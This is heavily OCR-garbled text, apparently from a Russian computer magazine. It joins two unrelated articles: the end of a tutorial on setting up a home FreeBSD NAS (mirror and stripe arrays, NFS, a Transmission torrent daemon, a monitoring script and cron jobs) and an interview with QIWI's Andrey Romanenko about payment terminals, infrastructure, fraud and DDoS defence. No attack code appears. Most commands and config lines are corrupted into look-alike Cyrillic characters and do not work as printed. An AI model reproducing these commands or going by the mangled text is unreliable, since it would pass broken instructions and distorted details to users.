"ПЗС иаегпаае - : "ПиЯЬаООЯТТЛЬ", 

Ѵі^-цШеПэІ-ы^ІнГг В. 



Ѵвеі і і пдв . ]5*п [ * I Е ,]Д ѵазсг Ірі ] 
Редактируем конфигТгапзтіззіоп 



«дтіггог зіаіиз». Теперь РАЮ 0. Объединить диски в такой массив 
также очень просто: 

# ^Біігіре ІоасІ 

# ^5І:гіре ІаЬеІ -ѵ -б 131072 с!а1:а асІ4 асіб 

Опция «-5 131072» здесь указывает размер страйпа (128 Кб), то 
есть чанка данных, который будет попеременно записываться то на 
один, то на другой диск. В результате информация окажется равно- 
мерно размыта по обоим дискам, и гибель одного из них приведет 
к потере всех данных. Также не стоит даже думать о сохранении 
существующих данных перед созданием массива. 

После того как массив будет создан, на нем следует создать 
файловую систему, смонтировать ее к нужному каталогу, добавить 
запись в ЫаЬ и заставить систему подцеплять зеркало/страйп при 
загрузке. Для РАЮ 1 это можно сделать так: 



# пем-Рз /сІеѵ/тіггог/сІа'Еа 

# тоиггЕ /с!еѵ/тіппог/сІа1:а /тпі: 

# есбо 1 /сіеѵ/тіггог/сіаііа /тпі: иТз гы 2 2 ' » /е1:с/-р5І:аЬ 

# есбо , ^еош_тіггог_1оасІ="УЕ$" 1 >> /Ьооіі/Іоасіег . соггР 

Для РАЮ 0 — так: 

# пем-Рз /с1еѵ/5І:гіре/с1а1:а 

# тоигтЕ /сіеѵ/зіігіре/сіаііа /тпі: 

# есбо 1 /сіеѵ/зіігіре/сіаііа /тпі: ц-Рб гы 2 2' >> /е1:с/-р5І:аЬ 

# есбо 1 %еот_з1:гіре_1оасІ="УЕ5" 1 >> /Ьооіі/Іоасіег . сопТ 

ЧАСТЬ 4. ТОРРЕІМТ И ЫР5 

Мы помним, что создавали файлохранилище для расшаривания 
данных между несколькими устройствами, поэтому надо найти 
способ экспорта файлов во внешний мир. Фактически такая 
функциональность уже есть, и она работает: это 5РТР-сервер, 
интегрированный в 55Н-сервер. В любой момент мы можем по- 
лучить доступ к данным с любого устройства, зная имя и пароль. 

С другой стороны, 5РТР неудобен тем, что не позволяет монтиро- 
вать ресурс и работать с файлами как с локальными (да, есть реа- 
лизации виртуальных ФС на Ризе, но попробуй воспользоваться 
ими в ѴѴіпсІоѵѵз или АпбгоісІ). Поэтому нам нужна сетевая файловая 
система, аименно — N Р5 (ничего неим ею против СІР5/5атЬа, но 
я не любитель сложных систем). 

ЫР5 во РгееВЗй настроить очень просто. Фактически, все, что 
нужно сделать, — это добавить три строки в /еІс/гс.сопР: 



грсЬіпсІ_епаЫе= 

п-Рз_зегѵег_епаЫе= 

тоип1:сН1а%5= 

Первая строка активирует сервис грсЬіпсІ, необходимый для 
работы ЫР5, вторая — сам сервер, а третья — демон монтирования, 
Далее добавляем в /еіс/ехрогіз имя экспортируемого каталога 
и перезагружаем демон монтирования: 

# есбо '/ігт-Е 1 > /еііс/ехрогііз 

# /е1:с/гс.сІ/тоип1:с1 опегеіоасі 

Все, теперь хранилище доступно по сети и его можно подклю- 
чить из І_іпих/РгееВ50 с помощью одной команды: 

# тксііг /тпіі/зегѵеп 

# есііо * 192 . 168.1 , 100: /тпі: /тпіѴзегѵег \ 

п-Рз 50-Р1=.іп1=^.п5І2е=8192.^л^5І2е=8192 , >> /е1:с/-р5І=аЬ 



Вторая задача нашего сервера: качать файлы из интернета 
в автоматическом режиме. Для этого нужен торрент-клиент без 
графического интерфейса. На эту роль отлично подходит сіоггепі, 
однако управлять закачкой файлов с помощью консольного интер- 
фейса не всем по душе, поэтому мы воспользуемся более продви- 
нутым решением под названием Ігапзтіззіоп-сіаетоп, который 
сидит в фоне и принимает команды управления отудаленного 
клиента или через веб-интерфейс. Он есть в репозитории преком- 
пилированных пакетов РгееВЗй, поэтому установить и настроить 
его нетрудно: 

# рк^асИ -г Іігапзтіззіоп-сіаетоп 

Далее редактируем файл /еіс/гс.сопб добавив в него следую- 
щие строки: 

# Включаем 1:гапзтіз5Іоп при загрузке 

1тап5тІ55Іоп_епаЫе="УЕ5" 

# Каталог с конфигами 

1:гап5тІ55Іоп_соп-Р_сІіг= 

# Каталог загрузок 

1:гап5тІ55Іоп_сІоып1оасІ_сІіг= 

# Пользователь, с правами которого работает демон 

ІтапзтізБІоп изег= 
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Создаем необходимые каталоги: 

# шксііг /и5п/1оса1/е1:с/1:гап5тІ55Іоп 

# сііоып -К 1:гап5тІ55Іоп:1:пап5тІ55Іоп \ 

/и5г/1оса1/е1:с/1:гап5тІ55Іоп 

# шксііг /тп1:/1:оггеп1:5 

# сбошп -К 1:гап5тІ55Іоп:1:гап5тІ55Іоп /тпіі/ііоггепііз 

Создаем конфиг/изг/ІосаІ/еІсЛгапзтівзіоп/зеиіпдздзоп: 

і 

/* Каталог для загрузки файлов */ 

"сіои/піоасі-сііг" : "\/тп1:\/1:оггеп1і5\/" . 

/* Лимиты на скорость скачивания и отдачи. Отключены. */ 

: л 

"сІоыпІоасІ-ІітіІі-епаЫесІ" : 0. 

"иріоасі-іітіі:" : 1000, 

"ирІоасІ-ІітіІі-епаЫесІ" : Ѳ. 

/* Сохранять файлы с маской 022 (18 в десятичной системе').*/ 
/* что позволит читать их другим пользователям */ 

/* Настройка интерфейса удаленного доступа */ 

'Ѵрс-аиіНепііЯса'Еіоп-гедиігесГ : 1. 

"грс-раззыогсі" : "ПАРОЛЬ". 

"грс-изегпате" : "ИМЯ ПОЛЬЗОВАТЕЛЯ" . 

"грс-ыИіІіеІізІі-епаЫесІ" : 0. 

1 

Наиболее важные в этом конфиге — последние четыре строки, они 
принуждают демон запрашивать права пользователя на управ- 
ление. В домашней сети это может быть излишеством, так что их 
можно заменить на одну строку: 

"грс-аи1:Ііеп1:ібса1:іоп-гедиігесІ" : 0. 

После этого демон можно запустить: 

# /изг/іосаі/еііс/гс.сі/іігапзтіззіоп з^агЕ 

И попробовать получить доступ к веб-интерфейсу: 

Ы:1р://1 92.1 68.0.1 00:909іЛгапзтІ55Іоп/ѵѵеЬ/. Также можно исполь- 
зовать удаленный клиент Тгапзтіззіоп Ретоіе 3111 ( а оо.а І/У ЬН е ) 
и один из многочисленных клиентов для АпсІгоісІ. 

ЧАСТЬ 5. СРОИ И ВСЕ-ВСЕ-ВСЕ 

Теперь, казалось бы, все работает. Сервер закачивает файлы 
с торрент-трекеров и благополучно отдает их другим машинам, 
но, во-первых, нужно следить за сервером (в особенности за за- 
битостью файловой системы), а во-вторых — каким-то образом 
регулировать работу торрент-клиента, иначе он не даст спокойно 

ІЫРО 

Для монтирования 
МРБвАп- 
СІГОІСІ можно 
использовать 
бесплатное 
приложение 
СіТзМападег 
(требует гооі, но 
понимает как СІР5, 
так и МРБ). 




Китайский БАТА КАЮ-контроллер 

работать в сети другим машинам. Для решения первой задачи я по- 
шел по простому пути. Вместо использования различных тяжелых 
систем мониторинга, которые необходимо устанавливать и на- 
страивать, я написал простой скрипт, который отдает нужную мне 
информацию о загруженности сервера и количестве свободного 
пространства в хранилище (температуру процессора, к сожале- 
нию, получить не удалось, поскольку на материнке нет нужных 
датчиков): 



#! /Ьіп/зіі 





РКЕЕ='сі-Р -б /тпі: 1 *аі1 -пі 1 соіитп -1: 1 сиі: -сі 1 


‘ --Р 7' 


І_ОАР=" иріііте | сиі: -сі 1 1 --Р 13-15^ 


есбо $І_ОАР : $РКЕЕ 


Скрипт возвращает примерно такую строку: 




0.19. 0.13. Ѳ. 14 : 546 





Скрипт можно разместить на сервере и вызывать с помощью 
55Н: 



$ ззіі д1т@192. 168.0. 100 /Ііоте/дІт/Ьіп/топ . зіі 

Причем вызывать не только руками, но и с помощью различных 
приложений, таких как монитор Сопку или специальный виджет 
рабочего стола. Лично я настроил вывод этих данных в статусную 
строку менеджера окон ІЗ. Для регулировки работы торрент- 
демона отлично подошел сгоп. В сгопіаб-файл гооСа (команда 
«сгопІаЬ -е») я прописал три строки: 

0 0*** /изг/іосаі/еііс/гс.сі/іігапзтіззіоп-сіаетоп зііагі: 

Ѳ 17 * * і _5 /изп/іосаі/еііс/гс .сі/іігапзтіззіоп-сіаетоп зііор 
0 10 * * 6-7 /изг/іосаі/еііс/пс .сі/іігапзтіззіоп-сіаетоп зііор 

Этот сгопІаЬ заставляет сгоп включать торрент-трекер в 12 
ночи каждый день и отключать в 17:00 по будням и в 10:00 по вы- 
ходным. Ты можешь подстроить его под свои вкусы и распорядок 
Дня. 

ВЫВОДЫ 

Используя древнее железо и немного китайских деталек, я собрал 
вполне пригодный для моих личных нужд сервер хранения данных, 
который полностью удовлетворяет моим требованиям. Если у тебя 
дома есть старое железо, не спеши его выбрасывать или прода- 
вать. Старый системный блок можно превратить не только в ЫА5, 
но и в шлюз, медиасервер или даже игровой автомат для старых 
добрых 16- и 32-битных игр. НС 



НАКР-0І5К РАІІ.ІІКЕ 

Если один из дисков в конфигурации РАШ 1 
вышел из строя, следует выполнить команду: 

# %тіггог -Роп^еі: сіаііа 

Заменить диск и вновь добавить его 
в массив: 

# ^шіггог іпбѳгЕ с!а1:а асіб 
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Интервью с создателем системы платежных терминалов 




ФАКТЫ 



ИНТЕРВЬЮ 
С СОЗДАТЕЛЕМ 
СИСТЕМЫ 
ПЛАТЕЖНЫХ 
ТЕРМИНАЛОВ 

АНДРЕЙ 

РОМАНЕНКО 



Сейчас сложно найти челове- 
ка, который ни разу не попол- 
нял счеттелефона с помощью 
платежного терминала. А ведь 
еще в 2000-х для пополнения 
баланса пришлось бы идти 
в офис оператора или покупать 
скретч-карту. О том, какой путь 
пришлось проделать, чтобы 
сформировать культуру исполь- 
зования платежных терминалов, 
и как устроена платежная систе- 
ма изнутри, нам в подробностях 
рассказал президент группы 
ОІѴѴІ Андрей Романенко. 



Все началось со скретч-карт. В конце 90-х 
сотовые операторы выпустили свой коробоч- 
ный продукт. Помните, были такие коробки 
билайновские («Би+») и МТСовские? Они на- 
чали продаваться сотнями тысяч штук, и стало 
ясно, что нужно все это как-то оплачивать. Для 
«Би+» выпустили скретч-карты номиналом 10, 
50 и 100 долларов (тогда еще все было в долла- 
рах). Мой приятель как раз устроился работать 
к сотовому оператору и обратился ко мне за 
советом, где эти карты лучше всего продавать. 
Я к тому времени уже два года занимался про- 
дажами и обещал подумать. 

На тот момент существовала барахолка 
горпеі.ги. Известное, старое место — не знаю, 
работает ли она сейчас. Там концентрирова- 
лось все, что связано с ІТ и инновациями. Я 
разместил там объявление: «Продаются карты 
Би+». Минут через пятнадцать мне позвонил 
некий Евгений с Савеловского вокзала и ска- 
зал: «Хочу купить 1000 карт по 10 долларов». 
Параллельно начался шквал звонков — 
«хотим!». Стало понятно, что есть актуальная 
тема, которой нужно заниматься. 
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С0ѴЕК5Т0КѴ 



Я создал компанию по дистрибуции 
скретч-карт. Мы сделали логистику, наняли 
специалистов по продажам и побежали по 
всей Москве и области — создавать точки 
дистрибуции и выставлять там карты. Сначала 
был только «Би+», но позже появились карты 
всех операторов сотовой связи, провайдеров 
доступа в Сеть и многих других компаний. 

В 2001 — 2003 годах доля в Москве у нас 
составляла порядка 70%. Мы стремились 
к инновациям и быстро начали использовать 
вендинговые машины. Это забавная история. 

В начале 2000-х годов в Москве была выстав- 
ка, где свои продукты представлял канадский 
производитель ОраІ. Они производили авто- 
маты по продаже скретч-карт для подводных 
лодок! Подводные лодки иногда поднимаются 
на поверхность, и, чтобы подводники могли 
звонить своим женам, им периодически необ- 
ходимо пополнять телефоны. Оказалось, что на 
подлодках установлено много таких автома- 
тов. В 2002 году мы начали ставить картоматы 
на пробу, и к середине 2004 года у нас уже 
было около 600 штук по Москве. Они были двух 
видов: на четыре типа карт и на восемь. Под- 
ходишь — стоит здоровенный металлический 
шкаф, килограммов 150. Вставляешь деньги, 
нажимаешь «Би+», и тебе выпадает карта. 



ОПЛАТА ЧЕРЕЗ Р05-ТЕРМИНАЛЫ 



В 2003 году ко мне пришли представители 
французской компании Іпдепісо и предложи- 
ли принципиально новую модель работы. За- 
чем, говорят, вы карточки возите? Это ведь так 
тяжело и небезопасно: у вас на точках продажи 
лежит большой объем карт, которые можно 
похитить. Атогда на точке в среднем, действи- 
тельно, лежало карточек разного номинала на 
1000 долларов. 

Французы предложили не наносить 
РШ-коды на скретч-карты, а печатать их на 
обычном РОБ-терминале. Соответственно, эти 
РІІМ-коды нужно предварительно было купить 
у оператора и выгрузить в биллинг. При ис- 
пользовании этой технологии скретч-карты не 
нужны — на точке оплаты достаточно выбрать 
оператора и получить РІ N на чеке. Но меня 
это не устроило. Это сейчас все привыкли, 
что можно получить что-то секретное по 5М5. 

А заплатить за какую-то бумажку в те времена 
было дикостью для человека — никто бы не 
воспринял это серьезно. 

Вместо этого я предложил французам 
сделать прямое пополнение счета. Идея такая: 



кассир выбирает на Р05-терминале оператора, 
вводит номер телефона, принимает деньги — 
и сразу осуществляется оплата. Без всяких РІІЧ- 
кодов. Они долго убеждали меня в том, что это 
не сработает, приводили много доводов против 
этой идеи, но все-таки согласились попробовать. 
Мы провели с ними ряд переговоров во Фран- 
ции, а потом получили смету. Любая крупная 
и уважающая себя западная компания за годы 
деятельности вырабатывает четкий прайс, где 
расписано, что сколько стоит и кактарифици- 
руется. В смете значилось: выезд специалиста 
в Москву — пять тысяч евро в час, за каждую 
транзакцию по полпроцента с нарастающим 
итогом, лицензионные платежи, сервисные 
сборы, и так далее. После этого я подумал, что, 
наверное, лучше будет сделать все самим :). 

В те годы РОБ-терминал стоил порядка 
1000 — 1500 долларов. Но мы нашли корейцев, 
компанию Ыписііх, — они приехали и привезли 
с собой в чемодане Р05-терминалы с образца- 
ми. У них один Р05-терминал стоил уже около 
400 долларов! 

На РОБ-терминалах корейцев стоял ІІпіх. 

Мы заключили договоры с операторами и на- 
писали прошивку, реализовав оплату для 
«МТС», «Билайна» и «Мегафона». Этим зани- 
малась команда моего специалиста, который 
ранее поддерживал 1 С, базы данных и всю 
ІТ-инфраструктуру нашего бизнеса по дистри- 
буции. При этом у него вообще не было опыта 
в процессинге. Однако вскоре мы запустили 
два продукта, позволяющих предпринимате- 
лям принимать платежи: через компьютерную 
программу (сейчас она называется «ОІѴѴІ 
Кассир») и Р05-терминал. Наши сотрудники 
проехали по 9000 торговым точкам и заменили 
скретч-карты на Р05-терминалы. 



КАК ПОЯВИЛИСЬТЕРМИНАЛЫ 



В марте 2005 года, когда все активно раз- 
вивалось и продажи росли, мы решили, что 
нужно делать отдельный платежный киоск. 

Терминал, платежный киоск, автомат самооб- 
служивания — все называют это по-разному. 

Сначала была идея доработать наши 
картоматы до платежного терминала. Мы 

пытались их редизайнить, переделать, вы- 
резать двери, добавить туда 12 — 17-дюймовый 
монитор, но добиться удовлетворительного 
результата так и не удалось. Как ни крути, это 
был прямой металлический шкаф, который не 
воспринимался как нечто новое, Ы-1есЬ'ное. 
Мы отказались от этой идеи. 



Мы пошли радикальным путем и нарезали 
около тридцати разных типов корпусов по 
разным лекалам. Так был найден оптималь- 
ный вариант — модель, которая сейчас пред- 
ставлена на рынке. 

Собирать комплектующие пришлось по все- 
му миру. В Москве тогда почти ничего не было, 
а нужно было откуда-то взять принтер, тачскрин, 
модем, купюрник. Однако в мае 2005-го мы все 
же получили прототип, утвердили его и заказали 
сто комплектов оборудования для терминала. 

В июне мы собрали первые сто штук, посмотре- 
ли на склад и подумали: что же с ними делать, 
куда это все продавать? На тот момент у нас уже 
было человек пятьсот дилеров в Москве и по 
России. Мы разместили объявление у себя на 
сайте и через три дня продали абсолютно все. 

А еще через три дня заказов у нас было еще на 
тысячу. Ажиотаж был страшный. Как в булочной: 
заходишь, пирожоктолько что испекли, а ты его 
сразу забрал. Было то же самое. 

Первый терминал появился в июне 2005 
года в Москве. Его поставили в «Алых пару- 
сах» на Щукинской. И он стоиттам до сих пор! 



УСТРОЙСТВО ТЕРМИНАЛА ОПЛАТЫ 



Железная составляющая терминала проста — 
это монитор с тачскрином, купюрник, принтер, 
модем и компьютер. Плюс еще наша разра- 
ботка — сторожевой таймер, который управ- 
ляется на уровне железа, а не ОС. Винда может 
подвиснутьтак, что помогает только ЬагсІгеБеС 
Соответственно, между компьютером и модемом 
стоит ѵѵаІсМод. Если он видит, что компьютер 
не отвечает, то делает ему ЬагсІгезеЕ Это мы 
придумали сами, и эти платы мы тоже штампуем 
самостоятельно. Еще у нас есть наработки под 
сигнализацию и прочие навороты. 

Все должно работать, как автомат Калаш- 
никова. Сейчас терминалы в среднем стоят 
75 000 рублей, но можно собрать и за 50 000. 
Только в таком случае купюрник будет стоить 
не 600 долларов, а 150. А купюрник за 150 дол- 
ларов не работает, как автомат Калашникова, 
а значит, ты будешь к нему постоянно ездить. 

В свою очередь, купюрник за 600 долларов ра- 
ботает годами, что уже испробовано, — кешкод 
будет надежен. 

К примеру, есть две категории купюрни- 
ков. Бывают купюрники для удаленной работы, 
у которых механизм гораздо лучше и дороже 
(потому что удаленное устройство должно 
работать без человека). И бывает дешевая 
версия купюрников, которые делались под 
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Интервью с создателем системы платежных терминалов 



В СРЕДНЕМ НА СЕГОДНЯ МЫ ОБРАБАТЫ- 
ВАЕМ 12 МИЛЛИОНОВ ОПЕРАЦИЙ В ДЕНЬ. 

В НОВОГОДНИЕ ПРАЗДНИКИ ПИК ДОХОДИТ 
ДО 1200 ОПЕРАЦИЙ В СЕКУНДУ 



игровые автоматы и под вендинговые машины. 
То есть для мест, где нет большого потока 
людей, большой выручки; где рядом всегда 
есть человек, который может подойти, открыть 
автомат, поправить купюру, вытащить ее и так 
далее. Нам такой процесс не подходит. 

Внутри терминалов крутится софт, кото- 
рый мы разрабатываем сами. Сейчас уже, на- 
верное, 200-я версия, которая поддерживает 
все виды принтеров в мире, все виды купюрни- 
ков, мониторов — словом, все те устройства, 
которые можно поставить в терминал. 

Наш софт предназначен для винды. У нас 
были попытки перейти на Ыпих, но мы поняли, 
что это уже невозможно. Дело в том, что мы 
постоянно дорабатываем наш софт, постоянно 
что-то доделываем. Чтобы в какой-то момент 
мы смогли перейти на Ыпих, одна команда 
должна была писать то, что уже сделано, 
а вторая — то, что еще делается. Мы поняли, 
что это нереально, и отказались от идеи пере- 
хода. Да и зачем? ѴѴіпсІоѵѵз ЕтЬесІсІесІ стоит 
всего 50 — 70 долларов. Берешь ЕтЬесІсІесІ, 
ставишь наш софт, и все прекрасно работает, 
нет никаких проблем. К тому же владельцы 
терминалов (дилеры СІІѴѴІ) набирают техников 
из фрилансеров, которые учатся в институте 
и готовы работать за небольшие деньги. Эти 
техники, как правило, не дружат с Ыпих. 

Существует мнение: на Ыпих все будет ра- 
ботать лучше. Ноу нас 120 000 терминалов по 
стране работает на винде, и все хорошо. Хотя, 
конечно, «Кулибины» есть: существуют пла- 
тежные системы, которые крутятся на Ыпих. 

Интерфейс терминала сейчас реализован 
на флеше. Но так как НТМЬб получил активное 
развитие, думаю, где-то через полгода мы 
перейдем на НТМІ_5-версию. С флешем, конеч- 
но, есть свои проблемы: высокая загрузка про- 
цессоров (есть компьютеры еще с 2005 года), 
на терминалы приходится подгружать новую 
версию плеера, и так далее. 



КАК УСТРОЕН ОІѴѴІ 



Вся база у нас находится в онлайне, нет ника- 
кой офлайновой технологии, потому что для 
нас это неприемлемо. Я удивляюсь, как многие 
банки до сих пор работают в разношенных БД 
и в офлайне. 

После первой установки софта на терми- 
нал все дальнейшие операции мы произ- 
водим в онлайне. Выходит новая версия — 
в онлайне обновляем. В онлайне мы управляем 
всем софтом и всё мониторим: скорость работы 
процессора, 5МАРТ по жесткому диску, сколь- 



ко чековой ленты осталось, сколько модем- 
трафика использовано , сколько денег в ку- 
пюрнике и в каких купюрах... Все параметры, 
сколько их есть, мы кладем в процессинг. 

У нас имеется большой-большой монито- 
ринг. С его помощью все наши 7500 партнеров, 
имея еТокеп и логин-пароль, могут зайти и уви- 
деть в онлайне всю свою сеть, все транзакции, 
все платежи — все, что происходит с любым тер- 
миналом (открыт он, закрыт, проинкассирован, 
выключен, включен, почему и так далее). Все это 
мы делали и придумывали сами. 

Начать работу с нами просто. Люди прихо- 
дят к нам, заключают договор, где-то покупают 
терминал, скачивают с нашего сайта софт, 
устанавливают его, устанавливают терминал 
на точку, и их дальнейшая задача — занимать- 
ся арендой, инкассацией, техобслуживанием. 
Мы же отвечаем за все, что связано с софтвер- 
ной частью. 

В среднем на сегодня мы обрабатываем 
12 миллионов операций в день. В пике — 
в среднем 200 операций в секунду. В новогод- 
ние праздники пик доходит до 1200 операций 
в секунду, во время других праздников — до 
600 операций в секунду. 



ІТ-ИНФРАСТРУКТУРА 



У нас есть три дата-центра — два в Москве 
(М1 и ММТС9] и один в Лондоне (ОІоЬаІ БѵѵіІН 
2) — и большой узел связи. Мы учредили 
специальную компанию, на которую все 
лицензировали, и сами работаем со всем 
телеком-оборудованием. Отдавать на аутсорс 
крупную сетевую инфраструктуру невозмож- 
но, особенно когда у тебя 1500 сотрудников 
(к слову, из них 350 — ІТ-шники), 25 офисов по 
стране, 21 страна — и все это связано в еди- 
ную сеть. Нам пришлось построить все самим: 
получить свои ІР, стойки на М9, соединиться 
со всеми операторами, купить свои маршру- 
тизаторы, все сделать самим. 

На разных площадках задействованы раз- 
ные сервера. Все в облаках: за счет виртуали- 
зации мы стали покупать меньше серверов. Все 
площадки соединены между собой, если одна из 
них отключится — в онлайне идет репликация 
на другие. Отключается одна — мы работаем на 
второй. За три года мы потратили на это КУЧУ 
денег, но при нашей капитализации, при наших 
оборотах, при наших возможностях... мы просто 
не имели права не потратить эти деньги. 

Несколько лет назад была ситуация, 
когда выгорела М9 (российская точка обмена 
интернет-трафиком. — Прим, редакции). 



Конечно, оттакого никто не спасется, и ничего 
не будет работать, ведь туда приходят все 
каналы. Но если завтра какой-нибудь Вася- 
бульдозерист с четырех сторон перережет всю 
оптику дата-центра, то просто будет работать 
другой дата-центр. 

Можно было сделать один дата-центр 
в Москве, другой где-нибудь в России, а тре- 
тий за рубежом, но пока очень дорого делать 
междугородную волоконную инфраструктуру. 

К примеру, десятигигабитный канал от Самары 
до Москвы обойдется в 200 000 долларов в ме- 
сяц. Овчинка выделки не стоит. 

В каждой стране, где мы работаем, у нас 
есть локальные площадки. Весь Ьаск — здесь, 
а весь ітопі — там. В каждой стране мы выбира- 
ем топ-5 дата-центров, берем несколько стоек, 
ставим оборудование, и все взаимодействие 
с локальными провайдерами происходит оттуда. 



О БЕЗОПАСНОСТИ В ОІѴѴІ 



Фрода с каждым годом становится все мень- 
ше. Потому что с каждым годом мы наш опыт 
и знания совершенствуются. Каждые три месяца 
узнаешь больше, чем знал раньше, и понима- 
ешь, где, как и что лучше подлатать, как лучше 
сделать. Раньше действительно проблемы были. 
Потому что использовался только логин-пароль, 
не было «картинки», не было отсылки пароля по 
5М5, не было еТокеп и так далее. 

Раньше у нас не было даже фрод- 
мониторинга — то есть не было никакого со- 
фта, который бы анализировал легитимность 
транзакций. Сейчас у нас в три смены сидит 
большая группа специалистов, анализирую- 
щих операции с помощью специального софта. 

Хакеры всегда активно развиваются, и па- 
раллельно с ними развивается весь осталь- 
ной мир. Думаю, ни одна компания в мире 
не может сказать, что у нее нет дыр. Так не 
бывает. Конечно, дыры есть. Вопрос — к чему 
они ведут? Вот это главное, на этом нужно со- 
средотачиваться. Для нас крайне важно, чтобы 
деньги пользователя были в безопасности, а у 
нас они в безопасности. 

Софт терминалов доступен всем без ограни- 
чений, и раньше бывали случаи, когда владель- 
цы терминалов его модифицировали. Сейчас 
это невозможно из-за контроля над целостно- 
стью: если внести изменения, то ПО перестает 
работать. Полагаю, при желании с софтом можно 
что-то сделать, как-то его изменить, но только на 
очень сложном уровне. Ктомуже, если это кто- 
то сделает, значит, он имеет доступ к терминалу. 
Значит, это свой же сотрудник. 

У нас маленькие платежи, зачем ломать 
нас? Чтобы вывести с чьего-то аккаунта пару 
тысяч рублей? Проще обмануть какой-нибудь 
западный банк, со счета юридического лица 
забрать миллионы, потом прогнать их через 
десяток разных банков, запутать следы и вы- 
вести куда-нибудь на Кайманы. Зачем парить- 
ся с тысячью рублями? 

Мы храним ФИО и телефоны. Хакерам это 
неинтересно. Мы не храним карточки и их 
реквизиты, в соответствии с банковскими 
требованиями. 
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За последние пять лет нас неоднократно 
ОйоБ'или. Зачем, для чего, почему? Неизвест- 
но. Но с каждой атакой ты все больше учишься. 
Если раньше у нас были чужие ІР-адреса, то 
сейчас у нас отдельная телеком-компания, на 
которой большое количество каналов связи. 
Наша пропускная способность — гигабит пять- 
десят. У нас свои ІР-адреса, мы не зависим от 
провайдеров, и даже если кто-то знает одного из 
них — никто не знает других. Мы можем просто 
в онлайне сменить провайдера, сменить сеть, 
подсеть, и пусть атакуют, хорошая тема :). 

Ни один провайдер тебя никогда не защи- 
тит от ООоБ'а лучше, чем ты сам. Для них ты 
всего лишь один из тысяч клиентов, которому 
они продают канал. В России по пальцам 
можно пересчитать телеком-провайдеров, кто 
продает услугу защиты от 00о5. 

У нас есть Сізсо ОиагсІ и все остальные же- 
лезки и софтины, которые существуют в мире 
для борьбы с йОоБ. Принцип их работы в целом 
прост: железка весьтрафикзапоминает и ана- 
лизирует его — если вдруг начинается какой-то 
другой трафик, она на аппаратном уровне все 
это фильтрует. Конечно, Сізсо — это не панацея. 
Необходимо использовать целый комплекс обо- 
рудования, использовать разные технологии. Мы 
активно сотрудничаем с компаниями, которые 
занимаются защитой от ОйоБ, обмениваемся 
данными, наработками, опытом. Ведь ОйоВ — 
большая общемировая проблема, она есть, и мы 
учимся с ней бороться, становимся лучше. 

ОйоБ нам не страшен еще и по другой 
причине. Когда вы с телефона, через сотового 
оператора, заходите к нам на ресурс — вы не 
идете в интернет. С базовой станции вы доле- 
таете до маршрутизатора оператора, и оператор 
отправляет вас не в интернет — он отправляет 
вас к нам в канал. Со всеми операторами сотовой 
связи и с большими интернет-провайдерами 
у нас порядка трехсот прямых каналов. 

Вирус в терминалах встречался. В феврале 
2011 года йг.ѴѴеЬ нашел троян под названием 
Тго)ап.РѴѴ5.05МР. В тот же день всем агентам 
предоставили информацию о его появлении. 
При анализе была выявлена крайне низкая 
активность. Он появился на нескольких тер- 
миналах — мы и йг.ѴѴеЬ его отловили. Сейчас 
на терминалах установлены антивирусные 
решения от разных вендоров. 

Да, когда приезжают техники, можно 
в терминал вставить флешку и принести вирус, 
но что дальше? Отправить деньги на другой 
номер? Мы об этом узнаем (щелкает пальцами) 
через пять минут. Если пользователь заплатил 
за телефон, но не получил 5М5 или проверил 
свой баланс и не увидел там денег, он сразу же 
пойдет и скажет об этом. Это происходит мол- 
ниеносно — в течение дня ты сразу узнаешь, 
что у тебя появилась проблема. 



МЕЖДУНАРОДНАЯ ЭКСПАНСИЯ 



Нигде в мире больше нет такой культуры 
терминалов. Мы создали и этутехнологию, и сам 
способ оплаты. Впрочем, два года назад мы 
все-таки натолкнулись на одну американскую 
компанию — ТІО. Они утверждают, что не знали 



о нас, за нами не смотрели и не наблюдали. Но 
они повторяли, делали те же шаги, что и мы. Ну, 
или мы повторяли за ними :). У нас совершенно 
разные масштабы: у них сейчас что-то около двух 
тысяч киосков. Однако они до сих пор не поняли 
одного — нужно смотреть на терминал глазами 
пользователя. Нужно работать с юзабилити. Что- 
бы каждая кнопочка, каждая фенечка, каждая 
штучка были актуальны и понятны. Если в Аме- 
рике подойти к их терминалу, вы сразу поймете: 
интерфейс никакой. Простой пример: чтобы за- 
платить за мобильник, у меня ушло десять минут. 
Кто-то, конечно, платит, но в целом, думаю, они 
теряют аудиторию. Нам же удалось создать такой 
продукт, который дальше удалось запустить и в 
других странах. 

В 2006 году мы поехали в Г рузию на не- 
сколько дней. Посмотрели на рынок и увидели, 
что там тоже активно развиваются скретч- 
карты. У нас родилась идея — а почему не 
попробовать открыть «дочку» и не построить там 
такой же бизнес, как мы построили в России? 

В Грузии мы начали с РОБ'ов и компьютеров. 
Нашли партнеров, сделали дочку «ОСМП- 
Грузия» и начали развивать бизнес. Вскоре 
стало очевидно, что в Грузии все тоже отлично 
работает. Тогда мы создали отдельную команду, 
которая занялась развитием стран СНГ. Вскоре 
мы запустили Белоруссию, Украину, Казахстан, 
Молдавию. На сегодня охвачены почти все 
страны СНГ. 

Всего в системе ОІѴѴІ сейчас задейство- 
вана 21 страна. Бизнес между Россией и СНГ 
делится примерно как 75% на 25%. У нас есть 
цель — добиться, чтобы через пару лет бизнес 
делился 50 на 50. Чтобы некоторые становые 
риски были сняты. 

Имея контракты с операторами, нормальную 
команду для офиса, повторить бизнес-модель 
достаточно легко. Если страна кешевая, ника- 
кой сложности с этим не будет. Если страна до 
сих пор сидит на скретч-картах, если в стране 
больше чем 60% рге-раісі абонентов (не кон- 
трактных), то для нас эта страна открыта. Не вез- 
де мы заходили через сотовую связь. К примеру, 
в Азербайджане мы ставили для партнеров 
систему и киоски для оплаты газа. У местного 
поставщика газа была проблема со сбором 
денег — за газ никто не платил. Они поменяли 
по всей стране счетчики — в счетчике появилась 
карточка, а на карточке деньги. Когда карточку 
вынимаешь, без нее счетчик может работать 
около 12 часов. Соответственно, когда деньги 
кончаются — вынимаешь карточку, идешь к 
терминалу, вставляешь туда карту, кладешь 
деньги, деньги записываются, и ты несешь кар- 
точку обратно в счетчик. Таким образом удалось 
увеличить сборы в стране в несколько раз. 

Существует некий эффект массовости, 
определенный барьер количества точек, 
который нужно перейти. В поселке, в городе, 
в стране. Барьер, после которого люди начнут 
платить. К примеру, у нас есть одна страна... она 
худо-бедно развивалась, но почти не росла. Мы 
перешли барьер количества точек в столице, 
и начался рост — каждый месяц по 100 — 200%. 

На 10 000 человек должен приходиться 



один терминал. То есть, если речь о мил- 
лионнике, у тебя должно быть минимум сто 
терминалов в знаковых местах, чтобы их 
было видно. Потом просто сработает эффект 
массовости. 

Есть страны, которые не подходят нам 
из-за старых биллинг-операторов. Сотовые 
